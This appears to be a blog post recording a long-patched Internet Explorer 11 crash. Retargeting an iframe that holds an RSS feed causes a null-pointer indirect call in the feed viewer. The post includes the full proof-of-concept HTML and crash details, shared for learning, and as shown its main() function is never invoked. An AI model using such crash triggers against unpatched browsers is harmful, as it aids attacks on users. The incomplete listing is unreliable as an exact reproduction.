EoP: Crash Changing iFrame URL from RSS Feed

A brief crash report, though this one was classified as PROBABLY_EXPLOITABLE. Loading an RSS feed XML in a named iframe and then calling window.open("about:blank", "iFrame") to retarget that frame triggered a null pointer dereference in the feed viewer component.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IE11_EoP_Change_iFrameFeedsURL</title>
</head>
<body>
<iframe name="iFrame" width="200" height="30" border="1" src="feeds.xml"></iframe>
<script language="JavaScript">
function main()
{
	window.open("about:blank", "iFrame");
}
</script>
</body>
</html>

The crash occurred in IEFRAME!CFeedViewer::_HandleZoomChange+0x32 — a null read whose value was then used as the target of an indirect call, which is why the debugger classified it as PROBABLY_EXPLOITABLE. The feed viewer’s zoom-change handler attempted to call a virtual function through a null pointer when the frame’s content was being replaced out from under it.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS via Domainless about:blank and htmlFile ActiveX] :: [DoS: Opening and Immediately Closing an RSS Feed Window] >